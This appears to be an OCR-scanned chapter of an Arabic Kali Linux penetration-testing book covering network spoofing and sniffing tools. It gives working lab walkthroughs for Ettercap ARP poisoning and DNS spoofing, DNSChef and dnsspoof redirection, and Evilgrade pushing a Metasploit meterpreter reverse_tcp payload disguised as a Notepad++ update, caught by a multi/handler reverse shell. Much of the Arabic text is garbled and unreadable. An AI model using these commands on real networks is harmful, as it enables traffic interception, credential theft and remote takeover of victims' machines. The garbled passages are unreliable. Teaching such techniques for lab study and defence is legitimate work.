- Use DNS resolvers that forward only to trusted, authoritative upstream servers.
- Use a secure, monitored DNS server on the network.
- Restrict the DNS server's recursion service, fully or partially, to authorised users.
- Use DNS Non-Existent Domain (NXDOMAIN) rate limiting.
- Deploy an IDS on the network and configure it correctly.
- Use static IP addresses and static ARP tables.
- Use SSH, and encrypted protocols in general, so that redirected traffic cannot be read.
- Use tools that detect sniffing on the network.
- Prefer software that encrypts and authenticates its connections.
- Audit and secure your own DNS server regularly instead of relying on outside servers alone.



Network Spoofing Tools for Kali

Spoofing Tool: Ettercap

Source: http://ettercap.github.io/ettercap

Ettercap is a man-in-the-middle tool originally written by Alberto Ornaghi (ALoR) and Marco Valleri (NaGA). It supports active and passive dissection of many protocols and includes many features for network and host analysis. It works by ARP poisoning, placing itself in the middle of the traffic between two hosts, and from that position it can:

- modify the data in the connections it intercepts (modify data connections),
- collect passwords for protocols such as FTP, HTTP, POP, SSH1 and others,
- intercept SSL (HTTPS) traffic by presenting its own certificate to the client.

Ettercap has three interfaces: text mode, curses mode and a GTK graphical interface.

Running Ettercap

To start the graphical interface from the Kali menu, choose Sniffing/Spoofing > Network Sniffers > ettercap-graphical, or start it from a terminal with:

#ettercap -G

To run ettercap in text mode:

#ettercap -T






To run ettercap in curses mode:

#ettercap -C

DNS spoofing attack



In this example Ettercap is used to carry out DNS spoofing. The lab network is as follows: the DNS server is 192.168.2.1, the victim is 192.168.2.22, and the attacker's machine, which also runs an HTTP server, is 192.168.2.21.

The steps of the DNS spoofing attack are:

1. Start Ettercap in graphical mode as described above.
2. From the Sniff menu choose Unified sniffing and select the network interface.



[Screenshot: ettercap NG-0.7.4.2, Sniff menu with "Unified sniffing... Shift+U", "Bridged sniffing... Shift+B" and "Set pcap filter...".]

3. From the Hosts menu choose Scan for hosts, then Hosts list, to see the hosts found on the network.
4. Select the DNS server 192.168.2.1 and click "Add to Target 1"; then select the victim 192.168.2.22 and click "Add to Target 2".



[Screenshot: Ettercap Host List tab listing 192.168.2.1 (F4:EC:38:EC:07:DC), 192.168.2.20 (74:E5:0B:19:55:6A) and 192.168.2.22 (08:00:27:43:15:18) with the Delete Host, Add to Target 1 and Add to Target 2 buttons. The log reads: "Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... 3 hosts added to the hosts list... Host 192.168.2.1 added to TARGET1 / Host 192.168.2.22 added to TARGET2".]



5. Start ARP poisoning: from the Mitm menu choose Arp poisoning. The victim now associates the DNS server's IP address with the attacker's MAC address, so its DNS traffic passes through the attacker's machine.
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[Screenshot: Ettercap Mitm menu with Arp poisoning..., Icmp redirect..., Port stealing..., Dhcp spoofing... and Stop mitm attack(s); the log notes "SSL dissection needs a valid 'redir_command_on' script in the etter.conf file" and "Privileges dropped to UID 65534 GID 65534...".]



6. Start sniffing: from the Start menu choose Start sniffing.



[Screenshot: Ettercap Start menu (Start sniffing Ctrl+W, Stop sniffing Ctrl+E, Exit Ctrl+X) over the Targets tab; the log shows the ARP poisoning victims, "Starting Unified sniffing...", "Unified sniffing was stopped.", "ARP poisoner deactivated." and "RE-ARPing the victims...".]



7. Edit the file /usr/share/ettercap/etter.dns (or /etc/ettercap/etter.dns) and add records for the names to spoof, for example:

google.com A 192.168.2.21
*.google.com A 192.168.2.21
www.google.com PTR 192.168.2.21

These send every request for google.com to the attacker's web server.

8. Enable the dns_spoof plugin: from the Plugins menu choose Manage the plugins and double-click dns_spoof in the list that appears.



[Screenshot: Ettercap Plugins tab listing arp_cop 1.1 (Report suspicious ARP activity), autoadd 1.2 (Automatically add new victims in the target range), chk_poison 1.1 (Check if the poisoning had success), dns_spoof 1.1 (Sends spoofed dns replies, marked active) and dos_attack 1.0 (Run a d.o.s. attack against an IP address). The log shows the ARP poisoning victims GROUP 1: 192.168.2.1 F4:EC:38:EC:07:DC and GROUP 2: 192.168.2.22 08:00:27:43:15:18, then "Activating dns_spoof plugin...".]



9. On the victim, open google.com (or google.ru) in the browser.
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The browser lands on the attacker's web server instead of Google: the DNS spoofing has worked.



[Screenshot: Firefox on the victim showing the attacker's server's default page: "It works! This is the default web page for this server. The web server software is running but no content has been added, yet."]



10. To stop the attack, choose Stop mitm attack(s) from the Mitm menu, which re-ARPs the victims, and then stop sniffing.

[Screenshot: Ettercap Mitm menu (Arp poisoning..., Icmp redirect..., Port stealing..., Dhcp spoofing..., Stop mitm attack(s)) opened over the Plugins tab.]



The same attack can be run from the command line in text mode, giving the interface, the plugin, the MITM method and the two targets as arguments:

#ettercap -i eth0 -T -q -P dns_spoof -M ARP /192.168.2.1/ /192.168.2.22/

Scanning for merged targets (2 hosts)...
2 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.2.1 F4:EC:38:EC:07:DC
GROUP 2 : 192.168.2.22 08:00:27:43:15:18
Starting Unified sniffing...
Activating dns_spoof plugin...
dns_spoof: [safebrowsing-cache.google.com] spoofed to [192.168.2.21]

The remaining ettercap options are explained in its man page: http://linux.die.net/man/8/ettercap

JjjS Jaia ;^ail! £j^aj .^J^^J J^J*^ ^— ^ lij (J* lajudj) EttCFCcip ,>*ljVI J^-^^] J 


ARP Spoofing

The same interface is used for plain ARP spoofing (a man-in-the-middle position without the DNS plugin):

1. Start Ettercap in graphical mode as described above.
2. From the Sniff menu choose Unified sniffing and select the network interface.
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[Screenshot: ettercap NG-0.7.4.2 Sniff menu (Unified sniffing, Bridged sniffing... Shift+B, Set pcap filter...).]




3. From the Hosts menu choose Scan for hosts, then Hosts list.
4. Select the first host (here the router 192.168.2.1) and click "Add to Target 1"; then select the victim (192.168.2.22) and click "Add to Target 2".



[Screenshot: Ettercap Host List tab listing 192.168.2.1 (F4:EC:38:EC:07:DC) and 192.168.2.20 (74:E5:0B:19:55:6A) with the Delete Host, Add to Target 1 and Add to Target 2 buttons; the log reads "Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... 3 hosts added to the hosts list... Host 192.168.2.1 added to TARGET1 / Host 192.168.2.22 added to TARGET2".]



5. Start ARP poisoning: from the Mitm menu choose Arp poisoning. The victim now associates the router's IP address with the attacker's MAC address, so its traffic passes through the attacker's machine.



[Screenshot: ettercap Mitm menu (Arp poisoning..., Icmp redirect..., Port stealing..., Dhcp spoofing...) over the Host List; the log shows the interface MAC (eth1 -> 00:16:76:3B:06:E4), "SSL dissection needs a valid 'redir_command_on' script in the etter.conf file", "Privileges dropped to UID 65534 GID 65534..." and the Stop mitm attack(s) entry]



.Start Sniffing c3> j*^ £ l>j lsj^ cjIj^Vi Jajj^ ^ s^j^j^ll Start cij* ^ 




[Screenshot: ettercap log after stopping the attack:]

Starting Unified sniffing...
Unified sniffing was stopped.
ARP poisoner deactivated.
RE-ARPing the victims...
Spoofing Tool: DNSChef



http://thesprawl.org/projects/dnschef :
t> ^ J\ ^AZj ^ill ^la-JI jl^JI J] u^j^l cjUIL ^Ljil <ul^U jSa, ^Ulj SDNS Proxy j* DNSChef 

.A-ia - Sail A£jjuj JJ^>* c^-^ *J^ L g clA^ 6 6j^l3l d^A £xa II L_flJjJa>Jl 

^ ^ ji^i ^ill tSljl^a. s jU^U ^ujall jl^J DNS ^ ^1 £^ Uij^ ^iali ^DNSChef f t^i^t <> J 

:DNSChef 

,tSljl^> s jt^^U /etc/resolv.conf * — Jjaxj ^^Aiil Jji^l ^Ikj ^ 
.Control Panel ^ Network Connections jW^t c> ^ ^} 'Windows ^ 
^Lk jIjcIj ARP Spoofing JS* ^v^»"l <-*\fl*fl < J jVl ^11 yi SjjSUI DNS J) J jSI *4pl l& ^ 

.cjVVI c> o^jI ^l^kl^V c_ia1> jjoj ( >Ja t^JUll ^j^ill i> j DNS ^LaJI *Uac]j 'rogue DHCP 
.192.168.2.22 t>IPjl> ^ j 492.168.2.21 t>IPjl> ^DNSChef 

:DNS Proxy ^! i- 
:DNSChef ^» ^ J ai j-Vl 0^ ^ .Proxy * DNSChef 



#dnschef 



#host -t A google.com 



.DNS (localhost) yr^ 1 ( ^l^kl^V ^!^U ^ < jl^aJl ^ ^ 
:^U3I j*Vl ^wWi <A £>dt c> google.com o^j^ fiUiu>VI ^jj Ci3£ lil 

.dnschef j*VI Jj Uij 



root@kali:~# dnschef
          version 0.1

[*] DNS Chef started on interface: 127.0.0.1
[*] Using the following nameservers: 8.8.8.8
[*] No parameters were specified. Running in full proxy mode
[21:08:63] 127.0.0.1: proxying the response of type 'A' for google.com



DNS^ '31^ ^ (j?* uUjoiVi CjUIUI jj ^Iloj <li .Proxy ^ J^s DNSChef ^ ^ 

. 8.8.8.8> 
Faking Domain
:google.com J yA^ 1 ^ DNS ^UiJ 'google.com u^j^ 



msfadmin@metasploitable:~$ host -t ANY google.com
google.com has address 74.125.235.41
google.com has address 74.125.235.32
google.com has address 74.125.235.46
google.com has address 74.125.235.36
google.com has address 74.125.235.39
google.com has address 74.125.235.40
google.com has address 74.125.235.35
google.com has address 74.125.235.37
google.com has address 74.125.235.33
google.com has address 74.125.235.34
google.com name server ns2.google.com.
google.com name server ns1.google.com.
google.com name server ns3.google.com.
google.com name server ns4.google.com.
google.com has SOA record ns1.google.com. dns-admin.google.com. 1530371 7200 1800 1209600 300
msfadmin@metasploitable:~$
.DNS Chef J] /etc/resolv.conf .google.com o^j^^ DNS <^j2j ^ Uj&j 4 jVI

.JLLgjjII J J^l ^>^l <C.UiaJ ^ jij ^aJ (j-aj 

#dnschef --fakeip=192.168.2.21 --fakedomains google.com --interface 192.168.2.21 -q

.google.com u^j^ IP u'j^- t> JU3I j*VI ^l^ikloL ^jauJal l ^ jL jYI 

$host -t A google.com 

google.com has address 192.168.2.21 

; JVI gSLill ^ js DNSChef ^ lU^ l^I jW J U1

root@kali:~# dnschef --fakeip=192.168.2.21 --fakedomains google.com --interface 192.168.2.21 -q
[*] DNS Chef started on interface: 192.168.2.21
[*] Using the following nameservers: 8.8.8.8
[*] Cooking replies to point to 192.168.2.21 matching: google.com
[21:17:29] 192.168.2.22: cooking the response of type 'A' for google.com to 192.168.2.21

JU1I U J\ J^U d& j0.2 jl^-VI J\ ^ jsll J\ ^ 40.1 J uV» c> IPv6 J^f\ ^ V DNSChef 
. IPv6 J jj c^S lil ( https://thesprawl.org/media/projects/dnschef-0.2.1.tar.gz )

.DNSChef j*VI Jl -6 jW^I <LL^ 4ip v 6 ? I^-V 
#dnschef.py -6 --fakeipv6 fe80::a00:27ff:fe1c:5122 --interface :: -q

Spoofing Tool: dnsspoof 

DNS cjUaIJ A^U^a tSll ^jjj .arpspoof J J^ lU^j Dsniff ^lj^ <> j^ac ^ Dnsspoof 

^ .<jU!J ^5 jljj ^iUU lUjj DNS <(UDP) Jj£jhjjj Jc- DNS lU*j «11 JL^jVI <^ <Jc DNS 

6 DNS j* 4-^ ' 0 C5^ -DNS (J* ^ J ^ J -0 UJ"^ ' . C5"^J L j C5"^ J J ^ lC ' ^-^^^ f^^W a^jUjujVI 

L> ^ SYN/ACK ^jh V 4_i^ j IP jjjU^ <> :ui5 4^>. JL, J J^JI <> -d ^ 4CjU1]J UDP DNS 

.(IP JUjjI ±± U^l\ cy* ^Vl ^Jl V UDP 'TCP 

jj^aLJI DNS (*^^ <jL^1ujVI lS^S J jj^aaJI DNS <c.U^aj ^ j£i <JaLauj dnsspoof ^bVl 

^.UujjI (Ja* C5 ic l1a*J c^^Jlj (JjiiljJaxJl ( flla ^Uljl aJ jl tDNS ^^ll CjI jLoilaaVI ^-lAaJ LllljLaJjaj V I <C.Ll^a DnSSpOOf 

>C5 i^J| ^LaJt IP jl jic iaia <lis^ 

#dnsspoof [-i interface] [-f hostsfile] [expression] 

.(wildcards ^l^aJLmlj ^jujj c aUl 11a) l^iijjj ^1^31 
fii^ Jc (JliLd lia.V tg_a.^)judj L_a jjoj ^jll j tcpdump ftbVI ^ ^*i>>i^ll ^j!>U3I ^bviml ^iij ^-jl (J*ja expression jjj^'^I Lol 

:JV1£ 

#echo 1 > /proc/sys/net/ipv4/ip_forward   (enable IP forwarding)

#arpspoof -t 192.168.1.245 192.168.1.5 &

#arpspoof -t 192.168.1.5 192.168.1.245 &

#dnsspoof -f spoofhosts.txt host 192.168.1.245 and udp port 53
Spoofing Tool: Evilgrade

tilli j Cjliu will j^p^JI cialajiJajli ^ s^liiujVI V uj*^ $ a\\ l!*-?^ <-!j^ <iajujl c_j ji&a ciijj£jaj EvilGrade 

java J' ++I10tCpcid t8>1 J ( . lilaj ^^jll £c-gI^)JI A^u ^jj JJ^ <i]L ^^ic ^ j CjIjj^j <J-gc (JjJ^ia 

CjU^SI ^> cilU^ jjSj jl jSaj) .DNS Spoofing ? j^a 

^evilgrade j»l^a^it laj 

jJjUjuJ! (J-g U*^W <-S^^ ^ L>* *LS^ A O^^J 6t QJ^^^ jJ S^lc] <J*^ f ^ g UJ^ LdAjc jUaVl lA& <^L} 

Internal scenery: 

- Internal DNS access 

- ARP spoofing 

- DNS Cache Poisoning 

- DHCP spoofing 

- TCP hijacking 

- Wi-Fi Access Point impersonation 
External scenery: 

- Internal DNS access 

- DNS Cache Poisoning 

slSU^l ^jjjjjja ^ Ajiiiii ASn Cjli J£ 1 63 ^ ^ (modules)^^j^ c> Evilgrade 
^ ^jjujI uj^ cjUl^JI ^jli tillil DNSserverj webserver Ljajl ^ *j j .ai^ ^ ky^^l^t jll djj laall 4jUr. 

jikV l^l^ki^lj JaS *t£>V t*llij msfpayload jl "msfvenom" Metasploit si J ^^ki^j lJj^ j^kill liA ^ 

.A-lauJall 

Attacker IP: 192.168.168.156 [kali Gnome Desktop 64Bit] 
Victim IP: 192.168.168.159 [Windows XP SP2] 



I^VIS Jlia jjII yi evilgrade j*V! J^U ^> ciUij evilgrade ci^^' l!^-^ u^^ ^ 



root@JANA:~# evilgrade
[DEBUG] - Loading module: modules/express_talk.pm
[DEBUG] - Loading module: modules/miranda.pm
[DEBUG] - Loading module: modules/atube.pm
[DEBUG] - Loading module: modules/winzip.pm
...
www.infobytesec.com
- 63 modules available
evilgrade>
.evilgrade <jL«uJt ^ ^sll cj! jU^JI £4*^ ^jjl help 3_Aj£j f



evilgrade>help
Type 'help command' for more detailed help on a command.

  configure   Configure <module-name> - no help available
  exit        exits the program
  help        prints this screen, or help on 'command'
  reload      Reload to update all the modules - no help available
  restart     Restart webserver - no help available
  set         Configure variables - no help available
  show        Display information of <object>.
  start       Start webserver - no help available
  status      Get webserver status - no help available
  stop        Stop webserver - no help available
  version     Display framework version. - no help available
  vhosts      Show vhosts enable - no help available



.show modules j-*^ ^J-^ ^ 4-*-* ^ a>ikiu^l jll ^-1^ 



evilgrade>show modules
List of modules:

allmynotes
amsn
appleupdate
apptapp
apt
atube
autoit3
bbappworld
blackberry
bsplayer
ccleaner
clamwin
cpan
cygwin
dap
divxsuite
express_talk
...



configure <module-name) J^uj aLI^j pjb .^ill 



evilgrade>configure notepadplus
evilgrade(notepadplus)>



-cP^ show options ^ v^Wi UjI^I <^*j ^1 Cj! jL^JI j*] 



evilgrade(notepadplus)>show options
Display options:

Name = notepadplus
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ infobytesec
Description = "The notepad++ use GUP generic update proc
VirtualHost = "notepad-plus.sourceforge.net"

| Name   | Default           | Description     |
| enable | 1                 | Status          |
| agent  | ./agent/agent.exe | Agent to inject |

evilgrade(notepadplus)>
URL * ^ > ^ SjSLftl! L-u^aaj A\"% > ^11 ^La lie. <j| ^^-isu j VirtualHost o^lcl Sjjj^all ^£

. liA lJj^ cjSj notepad-plus.sourceforge.net 
.msfpayload ^ l^luL reverse_tcp agent ^ ^I^U c^*S ^3 .^LLaJI s jj^ll ^ ^jj U£ Agent yr* * 

#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.91 LPORT=1234 X > /root/Desktop/testing.exe



root@JANA:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.91 LPORT=1234 X > /root/Desktop/testing.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.8.91", "LPORT"=>"1234"}
root@JANA:~#







\JN& set agent ^I^L-U agent ^jA? ^jSjj evilgrade ^ 



evilgrade(notepadplus)>set agent /root/Desktop/testing.exe
set agent, /root/Desktop/testing.exe
evilgrade(notepadplus)>



.^U. 80 u' l> ^ j start c> ^ j evilgrade J^-^ <JU3I s jia^Jl 



evilgrade(notepadplus)>start
evilgrade(notepadplus)>
[13/7/2014:20:25:45] - [WEBSERVER] - Webserver ready. Waiting for connections ...

evilgrade(notepadplus)>



JL^ajV! jj d^IcI ^Ettercap ^ ; L_L^alL<JI cJ^-j ^ ^tacrl Lj^jI 'Evilgrade ^-^-j Cy* ^-I^jVI 

jI^cI l$A.teaj ^jll JjVI s j^aaJl .(jjiKllI AiU-bVU <j^aLk3) 6jSLalt C-Ij^j j^-n ijjj LoAio tilli j Evilgrade ^LA\ 

ic^VK etter.dns 

#nano /usr/share/ettercap/etter.dns or nano /etc/ettercap/etter.dns 

i^VtS OLII liA ^ jkJ! JU^I ^ 

notepad-plus.sourceforge.net A 192.168.8.91 



[Screenshot: the edited etter.dns file:]

################################
# microsoft sucks ;]
# redirect it to www.linux.org

notepad-plus.sourceforge.net A 192.168.8.91

microsoft.com A 198.182.196.56
*.microsoft.com A 198.182.196.56
www.microsoft.com PTR 198.182.196.56

# Wildcards in PTR are not allowed



.LLLoi Ll<Au La£ ettercap ~ i^Ludj l_a ^juj aJUII s jia^JI ^ 



[Screenshots: ettercap NG-0.7.3 Host List with the router address added as Target 1 and the victim address as Target 2; the Mitm > ARP poisoning dialog with the optional parameters "Sniff remote connections" (checked) and "Only poison one-way" (unchecked); and the Start menu (Start sniffing Ctrl+W, Stop sniffing Ctrl+E, Exit Ctrl+X)]



. Evilgrade*^! ^ c> lWW <J&\ 1234 ^ Netcat ^ v^>»n s 

J.ikU Ljajl U£ cjj . TCP / IPJ jjjjj J^luib t^i.nlt cjX^j jj^ diULi^H ( . uljj ijL ^ill jj^Ji Jj^I jjll stal Netcat 

■csjSVl c^j meterpreter 

#nc -l -v -p 1234

meterpreter l^^L? jt 



msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.195.128
LHOST => 192.168.195.128
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit

[*] Started reverse handler on port 4444
[*] Starting the payload handler...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.195.128:4444 -> 192.168.195.129:1071)

meterpreter > |



i 3 j^i^iij jjjjj jjj-* J ^tI. m\ jtjflj <jl jSa^n 



[Screenshot: Notepad++ with C:\Program Files\Notepad++\change.log open, listing the v5.3.1 new features and fixed bugs]




.ILLoj Uj^j U£ nc jl meterpreter *l o^j a^A^ yes (ij* ^j^j 
8.6 Sniffing Tools



jljiSllI j sniffing ti^^j ^ *<jVI 
m 4^}*\\\ djUUj Jc di> *aHil sniffing ^l ^l^aJLuit ^jjnun (j-i^lg.^! j <jal^<J sniffing 
.sniffing ^ ^iklauJI CjI j^VI <j-a .ii^x]! till q^jxa l_a jjoj <-jU3I li& ^ 



Sniffing Tool: Wireshark 



[Wireshark] 



^1 cAJhll jjSa. l-ijjoij ^.juuj jll jjkxJI jjL jl JjS ethereal wireshark 2006 

a£ ^ Jaxj jl£ 'yyii^ cJ^ 1 ^^ cs c> j^j^^ f j^- s^j^ j*j ' [Gerald Combs] ^ '1990 j^ljl 

J tCpdlimp ^-^ jll J ^Li^klauJl CjI j^VI (J^asu cilUfc Uiajl d±jl£ j t((J»i^\^ J O^S$ J**) (^joLujVI (JjliJlill ^Uaill 

^ j«j ethereal ^jMt *-^*il . L> *] aJ a^l ^ 1998 ^ Jlj^ J jVI ^Jl jjl^I j ethereal ^' ^ snoop 

.Network Integration Services Wffi* 
j^Jt ci!3i£ j ethereal <jj^ Jlj ^ .CACE Technologies j ^Jfr d£ '2006 j^* 

CjIcj jiauJ ^jjjLojI^ ethereal l^lp^ £^ jiau* ^vimj j^i tillil c (GPL)j^ ^ > ^ j ^sjj^ ^j^i ^J-s-^ J 



.wireshark ^Vl ^15 t*Uil ethereal j <^»UJI ^jjW^ ^3 ^ «t*Ui .wireshark 
^ ^ .wireshark ^ ^ ^jfl CACE ^ Riverbed Technology ^ ^ 2010 ^ 

.wireshark c^j J ethereal c>Vl ajjUiJ Ca^ J j ethereal j^j^ 



^ ^t^t) ^<^^,t( djj^j ^ ill La j j^t j JIj^uj ^^Ip vgjj Wireshark f^jj ^ ^ 

^Uiu£l j 6jbU ^j^J (jl oj V till AjjouIU Liajl j . JIjjoJI liA 4 t ia&1 ^1j ^3 tillil j 1jjj£ CiijliVl AaIsu jVl 1 W a £tij^al JaI 

t^ju) till <jjau3U ^-<J1 (j-d <jl t . ujuJI I^a .a£jJ^1 C5 lc Cj^j ^^>xj V ciu£ lij Vj a£jJo31 qaAa j \^\-\WfA j <J£LSuJl 

^a3j ,4£jjaJl ^^ic t8>i w j liU» 4i^>sLxJ <jojj£^ CjI^jjoJIj i (jisbuoWj i sjjjj^^^j ^ ^jjuiaII (j-<» l^j^l Wireshark 

,^Sjjjj JjJaal L^L\i lU*^ ^i*^ Wireshark lS^-^ j ^^ijl ^ cjKj/MI ^ jja ^ J£ ^ jj> ^ ^i^i^l ^aLoj 

^wireshark j) >^ 

Jjl^j j 4_jj1 j3_Il a£jJo31 jjc jl c^J^LuoVl jac* 5-1 jjuj aJLuijI ^jj L* ua*ifa u^i cjI£jJo31 jjc <iuj^<Jl ^j^Jl cj^ 2 ^ r» W^ireshark 

fii^ j ^-jH]l ^jia^su j ^jl^Jl 6jl^)^. ^.J^ ^xjolLoiJ j^a 6jl^pJl ^.J^ (JJ^ jW^ 1 obVl J^flJ (jl (j^J 1 ^ J > SJ ^jiajC. 

>t *ljLaAjj^! C;f Jj Uj <Jc^ cJ^^iil j ^ jSII AjjjI Ajj^JI 4^ j^^l <^ jjLd Igil U£ IgJU^ ^ ^iju^l j CjIjjVI J^a^ SbVl 
dj^. lil til^iii V cJl^iii ^Uaj ^1 [IDS intrusion detection system] ^ VI sbVl 6^ 

.L^JjIsLIj ^ jSLAuiJ l^jJa^>xlajj till *L<» j!>l!l CjUUill ^-iA^lj ^ (j^J ^(^^ cJ^jV 1 g o laJLujJ VI ( ; laJ La£j 4£jjaJl ^glc 
tillil jaJl ialEilV WinPcap f / *°^l JJJ^^I ^f^> (^5^ JJ^>^I C5^« C5^-^ ^'^ J -latajll till ^tJJJ tiljtui Jj) jJl 

'IEEE 802.11 c> ^jj^Uo a£jj^1I laSlL . WinPcap W-^^ <^^j»^l JaSa ^ jaJI -^^1 ^ 

lJUIVI cjI^j .Frame Relay 'Token Ring 'USB ^jlJI ^5 .(ATM) JVl aij— II sj^l 'PPP/HDLC 

.(display filter) lP 3 j 15 ^ ^l^i^L? ^U^' 
^cSl jll 4£jjuo3I CjI^j ^jJa jl till ^ajujJ .Ijjoj Ai^lLu^ll JjJ-a J^ (><u gaUl] SbVI *>i& ^I^JjojI



^ Jc. ^blj jj^I a£js. J£ <_sjj o 1 'J^j .promiscuous Jj^l 



[Diagram: Attacker -> Wireshark Tool -> Network -> Victim]



http://www.wireshark.org J^t £)\ j^*-^ cs-^] 4-^^ Ale L* <J£ j^j l!^*-^ ^Uaj A J Lajj jl (Jj^^iJ j^ja Iaa^Luj
.[apt-get] pi*^ j±nj\ jl£ bjj ^u v^m^ t 3^>JI Je Aij [# yum install wireshark] : JVIS & J

: jyi* djU, jjijii cjIj^ 

.Offline jt Online t^jll J J.^'^ ^ " 

.Tshark ^ TTY j> j^jll ~ v^i.^i ^l^klajU L*l jjc 1 * LI Sill ^li Jll CjULiJI till 

. Jj t . uu II j* U j^j 'NetBSD 'FreeBSD 'u^j^ 'OS X 'c^ 1 ^ Oj^j s^xl* cj K^^ J^ 

.(^jU^ll/o^ljill) l^JalalU Jll CjULJI CjlLjuajj j* ^a*JI ^c^j 
<USB 4ij3jLll luS3 i(ATM)JV! lJ! SJ*J <PPP/HDLC 'IEEE 802.11 ^ j^j c> * J^W- ' - 

.(A o^UJ! ^L-Vl f UiSll c> bUfcl) Ujxj <(FDDI)^ ^bfiM cK^ j .Frame Relay 'Token Ring 



^[(network analysis)] te±2A\ ja U *t 

aA**1\ ("J j£ jj jjJI JjlaJ M ( jgUti) a£jj^3I JJ^i .CjIj^II kj^Vi ^Ij^jj 'cjjj^'^ ^ ji^ j t^jlftVl cjla jj^JI tpbVl 

<J jj^^J! ^-ll^J ttilli £aj dua 4£jjuj cJl^ (j^akjai O^J .^^^^ J ^^^ , ^^> , ^ , ^ J^ r * ^ 1>t1 J^ a£jjoJI (JjI^j 

ci^linlajll jl (jljlkVI Jc j) ^^^juJI e-hVl ^jlj (jl ls^j^^ ^j^l ^f^ 1 l3^* uj^ ^i^^i CjIjI^ Jc 

. [TCP/IP]^vu-i:vi JjSj2 JJ# i fulfil .i 

Jll s 4 >V! ^I^VI CjUjIx^j IP jl DHCP 
?www. wireshark.org Jj <J ^^jjouJI aijj LdAjc l^JI L_jl&i3! ^jjj ^ill jll IP jl jjc <i^x-<i ^A^Luaxll ^ ?IP j^.^ 

jc t^L (j-aUJI ^^UJI ^jj L_fl5 jj lij cj^j liU ?I1a l-ujuj U ^^su V ciijlj Jasu V AJ DNS '^j bU 

(Packet capture) J*^ cr^'j [Pcap] cA^Sl* ^j^i ^bl Jj ^Hau 4Jli jj^LjJI J wireshark j»l^lujt 

ISpSft j& jaj JJ) CjUUJIj ? >JI JalUll ^j^mi J^ [AirPcap] jl [winPcap] 
.^cxAjjJl (J-^ J^ Pcap a fK o dllJJJ ,j£tjj (j! tililc ia^a ^^>Joi (^1 Jj ^tl^J AA^juj £Lx»ljjj3l C-UJJJ

jjijjj (JjT.uij ^UaL J-<isu Jll 6 j^VI J *LabViml ^jj .4_iaLjaVl 6 j^VI Jc- JUg ^jSuj Ua» jj^j ^ AirPcap ;4iaj^l4 

.4_iiLoj^l jj><JI Jj ^UIojVI J tiSjlui jj) jit 4^^klojj 

,^^J| JJ^a ^^P" J fiiLoJl CjVI^JI ^J^J j (jlal^xlaj! .3 

;4_JU3I ^l^JI J 4£jj^3I J jIulaS <jjou31j tiljUi jjI jll ~ ikl^ ?<£jjLi jj) jJ) - laJL uj liUJ 

jjjJl £-bVI ^JC ^tJJJ jAj^all j^ ^j^j] lA^jqVi ^JJj tciljLuj jjI jll (j-a lc jJjuj 

,4^JjoJI ^nlaj <iajaj| lAjLoij] ^1 Jj^y^\ cJj^^ J -^-£^1 A-il^c ^nJalli (JjlaJ 

, jjj-<J| ^^>^- ( ^-^> ^aal] 4£jjoJ! (JjI^j CjIj^S £txi!^)i3! Jajoij ^jl ^j£-<»Jj ^A^jjuall L_astjJa3l 

?djLi j.) jJI J^u uLS jl How Wireshark Captures Traffic ^ uL£ 

^ JaUjj j (Link-Layer) ^U^^ ^ j [OSI Model] t> ^*j[capture] JalislVI jj 

cj! jia^JI Jj jiaiila b^ ^tjjJa jllj (frame) jUaVI 



[Diagram: Wireshark architecture, top to bottom]
  GIMP Graphical Toolkit (GTK)
  Core Engine (dissectors, plug-ins, display filters)
  dumpcap / Capture Engine
  Wiretap Library
  libpcap / WinPcap (capture filter)
  network



4iUaJ Jc Axuau ;4^Xui Jj iiL Q^liJ) JJ JJJA^l) Jl^ J-uSJJ UjUP 

Jl^ jV ciUi j [Link-Layer] ^bJI Jj^ jj j NIC j 

J NIC J djliUaJ Jc^ Axusu tiljl^ jjI jll Liajl 

CjlaUaJ (jl ^IslSI ,(Jji^j3lj JalililVI ci^-^ C>° ^3^^ J^^>^ L - J ^^^^ 

>( jii3UJI UK J Ifrjuoii ^ NIC ^-^j 



:(OSI model J ^1 AiAJ!) c^UUJI 
AirPcap c^^^ J^VI J jj^j <^JajL -l^U WinPcap 

-L >Aii3 ^LJajU Aj^aU. LibPcap 
wireshark tS^ll c> ^ > ^*^ ^^j^ c^j [Pcap] ^j 
jjj-aj JalijlVI ^-Aatj ^LSU tilli j dumpcap c^*^ *^ J^*^ ^ ttiSjLi jjIjJI J^s j-a fO^' JalSSil A-aIa^ fjj

tiljLai jjI jll -latajJl cilja^G Jj SjjujLia A > <al -^1 djUUJl <j£j <a±la Jxjuui j* ^.1 j <j!>ljk j-a tA^JjuJl j-a <Jj^J jJl <Lg jaJl dll jUaj 

.[Wireshark capture engine] 

t*l Jj Jx^ij U j* lalSSlVI i> cr^ ^ J^V' [capture filter]-^^VI * jSk cUc ci^4? ^ 

^ jaJI ^ii^i J Berkeley Packet Filtering (BPF) (> v^ .. n JalislVI jSla .JaSa [capture engine] JalislVI 
Sjj*1I ; J jij s^clS cilliA j ^ j^JI ^-i^ ialiiilU ^ajL diia Wireshark jj ^j^I/lIiUIjjJI Jatajll ^jj j^ jjj^II aja ^ £-j^j 

^j^VU jl L$ ^UaiiLJl 'VpJl" ^ jll j CjU jLlaJI Cjj1£ Ul£a 4<^Jau^a 4_ljL> j (jSl j jlx-all Sjj£j L-LaJ 

<U j^-wdJ <JC L_flLuo£jjajVl .jl J-aJl J-^Vl J> 4_l£jauJl £JJJ cJ^J '(j^' 

JaliilVI j^aj *j tjllftll Jjjjoj Jc^ .W^fj] j Ja^jlVI 4jLc Jjt nn <^ill j& dumpcap ■JalSiVt <i! ja-a 

jj-dli Jll j [trace files] s- 3 ^— ^j*^ CjliLJI j .cjULj 6 ^ Ujlili L_aajjj ^j* MB 50 ^-^^-^ dAiLJI ^ <c ja^aI <jUaj 

.axj Uua liA (jjkij lJj^j [.pcapng] ^I^U 

[core engine]cr^^l tiSja^l 
